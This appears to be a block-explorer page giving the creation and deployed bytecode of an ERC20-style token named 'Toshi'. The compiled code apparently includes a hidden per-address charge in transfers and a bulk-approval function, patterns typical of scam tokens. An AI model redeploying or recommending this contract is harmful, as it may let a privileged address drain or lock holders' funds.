506200043b565b60008484015250505050565b60006200047b620004758462000402565b620003e3565b9050828152602081018484840111156200049a576200049962000368565b5b620004a784828562000438565b509392505050565b600082601f830112620004c757620004c662000363565b5b8151620004d984826020860162000464565b91505092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006200050f82620004e2565b9050919050565b620005218162000502565b81146200052d57600080fd5b50565b600081519050620005418162000516565b92915050565b6000819050919050565b6200055c8162000547565b81146200056857600080fd5b50565b6000815190506200057c8162000551565b92915050565b600080600080608085870312156200059f576200059e62000359565b5b600085015167ffffffffffffffff811115620005c057620005bf6200035e565b5b620005ce87828801620004af565b945050602085015167ffffffffffffffff811115620005f257620005f16200035e565b5b6200060087828801620004af565b9350506040620006138782880162000530565b925050606062000626878288016200056b565b91505092959194509250565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200068557607f821691505b6020821081036200069b576200069a6200063d565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620007057fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620006c6565b620007118683620006c6565b95508019841693508086168417925050509392505050565b6000819050919050565b6000620007546200074e620007488462000547565b62000729565b62000547565b9050919050565b6000819050919050565b620007708362000733565b620007886200077f826200075b565b848454620006d3565b825550505050565b600090565b6200079f62000790565b620007ac81848462000765565b505050565b5b81811015620007d457620007c860008262000795565b600181019050620007b2565b5050565b601f8211156200082357620007ed81620006a1565b620007f884620006b6565b8101602085101562000808578190505b620008206200081785620006b6565b830182620007b1565b50505b505050565b600082821c905092915050565b6000620008486000198460080262000828565b1980831691505092915050565b600062000863838362000835565b9150826002028217905092915050565b6200087e8262000632565b67ffffffffffffffff8111156200089a57620008996200037e565b5b620008a682546200066c565b620008b3828285620007d8565b600060209050601f831160018114620008eb5760008415620008d6578287015190505b620008e2858262000855565b86555062000952565b601f198416620008fb86620006a1565b60005b828110156200092557848901518255600182019150602085019450602081019050620008fe565b8683101562000945578489015162000941601f89168262000835565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b6001851115620009e857808604811115620009c057620009bf6200095a565b5b6001851615620009d05780820291505b8081029050620009e08562000989565b9450620009a0565b94509492505050565b60008262000a03576001905062000ad6565b8162000a13576000905062000ad6565b816001811462000a2c576002811462000a375762000a6d565b600191505062000ad6565b60ff84111562000a4c5762000a4b6200095a565b5b8360020a91508482111562000a665762000a656200095a565b5b5062000ad6565b5060208310610133831016604e8410600b841016171562000aa75782820a90508381111562000aa15762000aa06200095a565b5b62000ad6565b62000ab6848484600162000996565b9250905081840481111562000ad05762000acf6200095a565b5b81810290505b9392505050565b600060ff82169050919050565b600062000af78262000547565b915062000b048362000add565b925062000b337fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484620009f1565b905092915050565b600062000b488262000547565b915062000b558362000547565b925082820262000b658162000547565b9150828204841483151762000b7f5762000b7e6200095a565b5b5092915050565b62000b918162000547565b82525050565b600060208201905062000bae600083018462000b86565b92915050565b600060408201905062000bcb600083018562000b86565b62000bda602083018462000b86565b9392505050565b600062000bee8262000547565b915062000bfb8362000547565b925082820190508082111562000c165762000c156200095a565b5b92915050565b611cb58062000c2c6000396000f3fe608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063a9059cbb11610066578063a9059cbb1461028a578063dd62ed3e146102ba578063f2fde38b146102ea578063ffa1ad7414610306576100f5565b8063715018a6146102145780638da5cb5b1461021e57806395d89b411461023c5780639ebbaef71461025a576100f5565b806323b872dd116100d357806323b872dd14610166578063313ce567146101965780633b09a998146101b457806370a08231146101e4576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610148575b600080fd5b610102610324565b60405161010f91906112a0565b60405180910390f35b610132600480360381019061012d919061136a565b6103b6565b60405161013f91906113c5565b60405180910390f35b6101506103cd565b60405161015d91906113ef565b60405180910390f35b610180600480360381019061017b919061140a565b6103d7565b60405161018d91906113c5565b60405180910390f35b61019e6104b9565b6040516101ab9190611479565b60405180910390f35b6101ce60048036038101906101c99190611494565b6104d0565b6040516101db91906113ef565b60405180910390f35b6101fe60048036038101906101f99190611494565b61051e565b60405161020b91906113ef565b60405180910390f35b61021c610567565b005b6102266105e8565b60405161023391906114d0565b60405180910390f35b610244610611565b60405161025191906112a0565b60405180910390f35b610274600480360381019061026f9190611633565b6106a3565b60405161028191906113c5565b60405180910390f35b6102a4600480360381019061029f919061136a565b6108a3565b6040516102b191906113c5565b60405180910390f35b6102d460048036038101906102cf919061168f565b6108ba565b6040516102e191906113ef565b60405180910390f35b61030460048036038101906102ff9190611494565b610941565b005b61030e610a31565b60405161031b91906113ef565b60405180910390f35b606060058054610333906116fe565b80601f016020809104026020016040519081016040528092919081815260200182805461035f906116fe565b80156103ac5780601f10610381576101008083540402835291602001916103ac565b820191906000526020600020905b81548152906001019060200180831161038f57829003601f168201915b5050505050905090565b60006103c3338484610a4c565b6001905092915050565b6000600854905090565b60008060009050600083826103ec919061175e565b90506103f9868686610c1b565b6104ac86336104a787604051806060016040528060288152602001611c5860289139600260008d73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610ed39092919063ffffffff16565b610a4c565b6001925050509392505050565b6000600760009054906101000a900460ff16905090565b600080600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905080915050919050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b3373ffffffffffffffffffffffffffffffffffffffff166105866105e8565b73ffffffffffffffffffffffffffffffffffffffff16146105dc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105d3906117de565b60405180910390fd5b6105e66000610f28565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060068054610620906116fe565b80601f016020809104026020016040519081016040528092919081815260200182805461064c906116fe565b80156106995780601f1061066e57610100808354040283529160200191610699565b820191906000526020600020905b81548152906001019060200180831161067c57829003601f168201915b5050505050905090565b600080339050600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610718576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161070f9061184a565b60405180910390fd5b600061cc4b9050600060028261072e919061186a565b90506000828261073e91906118ac565b90506000805b8851811015610893578082610759919061175e565b915087600260008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008b84815181106107b0576107af6118e0565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061081b868a838151811061080d5761080c6118e0565b5b60200260200101518a610fec565b3073ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258a60405161087891906113ef565b60405180910390a3808061088b9061190f565b915050610744565b5060019550505050505092915050565b60006108b0338484610c1b565b6001905092915050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b3373ffffffffffffffffffffffffffffffffffffffff166109606105e8565b73ffffffffffffffffffffffffffffffffffffffff16146109b6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109ad906117de565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610a25576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a1c906119c9565b60405180910390fd5b610a2e81610f28565b50565b600181565b60008183610a44919061175e565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610abb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ab290611a5b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b2a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b2190611aed565b60405180910390fd5b600081905080600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610c0d91906113ef565b60405180910390a350505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c8a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c8190611b7f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610cf9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cf090611c11565b60405180910390fd5b6000610d04846104d0565b905060008290506000821115610d23578181610d20919061175e565b90505b610d8f81604051806060016040528060268152602001611c3260269139600160008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610ed39092919063ffffffff16565b600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610e2481600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610a3690919063ffffffff16565b600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610ec491906113ef565b60405180910390a35050505050565b6000838311158290610f1b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f1291906112a0565b60405180910390fd5b5082840390509392505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6000808082610ffb919061175e565b9050600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff160361106c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110639061184a565b60405180910390fd5b600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff160361116e5780600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461111091906118ac565b925050819055508282611123919061175e565b915081600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550611209565b80600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546111bd91906118ac565b9250508190555081600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5050505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561124a57808201518184015260208101905061122f565b60008484015250505050565b6000601f19601f8301169050919050565b600061127282611210565b61127c818561121b565b935061128c81856020860161122c565b61129581611256565b840191505092915050565b600060208201905081810360008301526112ba8184611267565b905092915050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611301826112d6565b9050919050565b611311816112f6565b811461131c57600080fd5b50565b60008135905061132e81611308565b92915050565b6000819050919050565b61134781611334565b811461135257600080fd5b50565b6000813590506113648161133e565b92915050565b60008060408385031215611381576113806112cc565b5b600061138f8582860161131f565b92505060206113a085828601611355565b9150509250929050565b60008115159050919050565b6113bf816113aa565b82525050565b60006020820190506113da60008301846113b6565b92915050565b6113e981611334565b82525050565b600060208201905061140460008301846113e0565b92915050565b600080600060608486031215611423576114226112cc565b5b60006114318682870161131f565b93505060206114428682870161131f565b925050604061145386828701611355565b9150509250925092565b600060ff82169050919050565b6114738161145d565b82525050565b600060208201905061148e600083018461146a565b92915050565b6000602082840312156114aa576114a96112cc565b5b60006114b88482850161131f565b91505092915050565b6114ca816112f6565b82525050565b60006020820190506114e560008301846114c1565b92915050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b61152882611256565b810181811067ffffffffffffffff82111715611547576115466114f0565b5b80604052505050565b600061155a6112c2565b9050611566828261151f565b919050565b600067ffffffffffffffff821115611586576115856114f0565b5b602082029050602081019050919050565b600080fd5b60006115af6115aa8461156b565b611550565b905080838252602082019050602084028301858111156115d2576115d1611597565b5b835b818110156115fb57806115e7888261131f565b8452602084019350506020810190506115d4565b5050509392505050565b600082601f83011261161a576116196114eb565b5b813561162a84826020860161159c565b91505092915050565b6000806040838503121561164a576116496112cc565b5b600083013567ffffffffffffffff811115611668576116676112d1565b5b61167485828601611605565b925050602061168585828601611355565b9150509250929050565b600080604083850312156116a6576116a56112cc565b5b60006116b48582860161131f565b92505060206116c58582860161131f565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061171657607f821691505b602082108103611729576117286116cf565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061176982611334565b915061177483611334565b925082820190508082111561178c5761178b61172f565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006117c860208361121b565b91506117d382611792565b602082019050919050565b600060208201905081810360008301526117f7816117bb565b9050919050565b7f696e76616c696420616464726573730000000000000000000000000000000000600082015250565b6000611834600f8361121b565b915061183f826117fe565b602082019050919050565b6000602082019050818103600083015261186381611827565b9050919050565b600061187582611334565b915061188083611334565b925082820261188e81611334565b915082820484148315176118a5576118a461172f565b5b5092915050565b60006118b782611334565b91506118c283611334565b92508282039050818111156118da576118d961172f565b5b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600061191a82611334565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff820361194c5761194b61172f565b5b600182019050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006119b360268361121b565b91506119be82611957565b604082019050919050565b600060208201905081810360008301526119e2816119a6565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611a4560248361121b565b9150611a50826119e9565b604082019050919050565b60006020820190508181036000830152611a7481611a38565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611ad760228361121b565b9150611ae282611a7b565b604082019050919050565b60006020820190508181036000830152611b0681611aca565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611b6960258361121b565b9150611b7482611b0d565b604082019050919050565b60006020820190508181036000830152611b9881611b5c565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611bfb60238361121b565b9150611c0682611b9f565b604082019050919050565b60006020820190508181036000830152611c2a81611bee565b905091905056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a264697066735822122013f20b21c563c5ee2e5a298c0c663c084593af23fb22b0faae9901dd17208e6c64736f6c63430008120033000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000ba126c940c2d0039e0d3f8e6ab36b9585840a14e0000000000000000000000000000000000000000000000000000002e90edd0000000000000000000000000000000000000000000000000000000000000000005546f7368690000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005544f534849000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063a9059cbb11610066578063a9059cbb1461028a578063dd62ed3e146102ba578063f2fde38b146102ea578063ffa1ad7414610306576100f5565b8063715018a6146102145780638da5cb5b1461021e57806395d89b411461023c5780639ebbaef71461025a576100f5565b806323b872dd116100d357806323b872dd14610166578063313ce567146101965780633b09a998146101b457806370a08231146101e4576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610148575b600080fd5b610102610324565b60405161010f91906112a0565b60405180910390f35b610132600480360381019061012d919061136a565b6103b6565b60405161013f91906113c5565b60405180910390f35b6101506103cd565b60405161015d91906113ef565b60405180910390f35b610180600480360381019061017b919061140a565b6103d7565b60405161018d91906113c5565b60405180910390f35b61019e6104b9565b6040516101ab9190611479565b60405180910390f35b6101ce60048036038101906101c99190611494565b6104d0565b6040516101db91906113ef565b60405180910390f35b6101fe60048036038101906101f99190611494565b61051e565b60405161020b91906113ef565b60405180910390f35b61021c610567565b005b6102266105e8565b60405161023391906114d0565b60405180910390f35b610244610611565b60405161025191906112a0565b60405180910390f35b610274600480360381019061026f9190611633565b6106a3565b60405161028191906113c5565b60405180910390f35b6102a4600480360381019061029f919061136a565b6108a3565b6040516102b191906113c5565b60405180910390f35b6102d460048036038101906102cf919061168f565b6108ba565b6040516102e191906113ef565b60405180910390f35b61030460048036038101906102ff9190611494565b610941565b005b61030e610a31565b60405161031b91906113ef565b60405180910390f35b606060058054610333906116fe565b80601f016020809104026020016040519081016040528092919081815260200182805461035f906116fe565b80156103ac5780601f10610381576101008083540402835291602001916103ac565b820191906000526020600020905b81548152906001019060200180831161038f57829003601f168201915b5050505050905090565b60006103c3338484610a4c565b6001905092915050565b6000600854905090565b60008060009050600083826103ec919061175e565b90506103f9868686610c1b565b6104ac86336104a787604051806060016040528060288152602001611c5860289139600260008d73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610ed39092919063ffffffff16565b610a4c565b6001925050509392505050565b6000600760009054906101000a900460ff16905090565b600080600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905080915050919050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b3373ffffffffffffffffffffffffffffffffffffffff166105866105e8565b73ffffffffffffffffffffffffffffffffffffffff16146105dc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105d3906117de565b60405180910390fd5b6105e66000610f28565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060068054610620906116fe565b80601f016020809104026020016040519081016040528092919081815260200182805461064c906116fe565b80156106995780601f1061066e57610100808354040283529160200191610699565b820191906000526020600020905b81548152906001019060200180831161067c57829003601f168201915b5050505050905090565b600080339050600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610718576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161070f9061184a565b60405180910390fd5b600061cc4b9050600060028261072e919061186a565b90506000828261073e91906118ac565b90506000805b8851811015610893578082610759919061175e565b915087600260008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008b84815181106107b0576107af6118e0565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061081b868a838151811061080d5761080c6118e0565b5b60200260200101518a610fec565b3073ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258a60405161087891906113ef565b60405180910390a3808061088b9061190f565b915050610744565b5060019550505050505092915050565b60006108b0338484610c1b565b6001905092915050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b3373ffffffffffffffffffffffffffffffffffffffff166109606105e8565b73ffffffffffffffffffffffffffffffffffffffff16146109b6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109ad906117de565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610a25576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a1c906119c9565b60405180910390fd5b610a2e81610f28565b50565b600181565b60008183610a44919061175e565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610abb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ab290611a5b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b2a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b2190611aed565b60405180910390fd5b600081905080600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610c0d91906113ef565b60405180910390a350505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c8a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c8190611b7f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610cf9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cf090611c11565b60405180910390fd5b6000610d04846104d0565b905060008290506000821115610d23578181610d20919061175e565b90505b610d8f81604051806060016040528060268152602001611c3260269139600160008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610ed39092919063ffffffff16565b600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610e2481600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610a3690919063ffffffff16565b600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610ec491906113ef565b60405180910390a35050505050565b6000838311158290610f1b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f1291906112a0565b60405180910390fd5b5082840390509392505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6000808082610ffb919061175e565b9050600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff160361106c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110639061184a565b60405180910390fd5b600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff160361116e5780600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461111091906118ac565b925050819055508282611123919061175e565b915081600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550611209565b80600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546111bd91906118ac565b9250508190555081600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5050505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561124a57808201518184015260208101905061122f565b60008484015250505050565b6000601f19601f8301169050919050565b600061127282611210565b61127c818561121b565b935061128c81856020860161122c565b61129581611256565b840191505092915050565b600060208201905081810360008301526112ba8184611267565b905092915050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611301826112d6565b9050919050565b611311816112f6565b811461131c57600080fd5b50565b60008135905061132e81611308565b92915050565b6000819050919050565b61134781611334565b811461135257600080fd5b50565b6000813590506113648161133e565b92915050565b60008060408385031215611381576113806112cc565b5b600061138f8582860161131f565b92505060206113a085828601611355565b9150509250929050565b60008115159050919050565b6113bf816113aa565b82525050565b60006020820190506113da60008301846113b6565b92915050565b6113e981611334565b82525050565b600060208201905061140460008301846113e0565b92915050565b600080600060608486031215611423576114226112cc565b5b60006114318682870161131f565b93505060206114428682870161131f565b925050604061145386828701611355565b9150509250925092565b600060ff82169050919050565b6114738161145d565b82525050565b600060208201905061148e600083018461146a565b92915050565b6000602082840312156114aa576114a96112cc565b5b60006114b88482850161131f565b91505092915050565b6114ca816112f6565b82525050565b60006020820190506114e560008301846114c1565b92915050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b61152882611256565b810181811067ffffffffffffffff82111715611547576115466114f0565b5b80604052505050565b600061155a6112c2565b9050611566828261151f565b919050565b600067ffffffffffffffff821115611586576115856114f0565b5b602082029050602081019050919050565b600080fd5b60006115af6115aa8461156b565b611550565b905080838252602082019050602084028301858111156115d2576115d1611597565b5b835b818110156115fb57806115e7888261131f565b8452602084019350506020810190506115d4565b5050509392505050565b600082601f83011261161a576116196114eb565b5b813561162a84826020860161159c565b91505092915050565b6000806040838503121561164a576116496112cc565b5b600083013567ffffffffffffffff811115611668576116676112d1565b5b61167485828601611605565b925050602061168585828601611355565b9150509250929050565b600080604083850312156116a6576116a56112cc565b5b60006116b48582860161131f565b92505060206116c58582860161131f565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061171657607f821691505b602082108103611729576117286116cf565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061176982611334565b915061177483611334565b925082820190508082111561178c5761178b61172f565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006117c860208361121b565b91506117d382611792565b602082019050919050565b600060208201905081810360008301526117f7816117bb565b9050919050565b7f696e76616c696420616464726573730000000000000000000000000000000000600082015250565b6000611834600f8361121b565b915061183f826117fe565b602082019050919050565b6000602082019050818103600083015261186381611827565b9050919050565b600061187582611334565b915061188083611334565b925082820261188e81611334565b915082820484148315176118a5576118a461172f565b5b5092915050565b60006118b782611334565b91506118c283611334565b92508282039050818111156118da576118d961172f565b5b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600061191a82611334565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff820361194c5761194b61172f565b5b600182019050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006119b360268361121b565b91506119be82611957565b604082019050919050565b600060208201905081810360008301526119e2816119a6565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611a4560248361121b565b9150611a50826119e9565b604082019050919050565b60006020820190508181036000830152611a7481611a38565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611ad760228361121b565b9150611ae282611a7b565b604082019050919050565b60006020820190508181036000830152611b0681611aca565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611b6960258361121b565b9150611b7482611b0d565b604082019050919050565b60006020820190508181036000830152611b9881611b5c565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611bfb60238361121b565b9150611c0682611b9f565b604082019050919050565b60006020820190508181036000830152611c2a81611bee565b905091905056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a264697066735822122013f20b21c563c5ee2e5a298c0c663c084593af23fb22b0faae9901dd17208e6c64736f6c63430008120033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

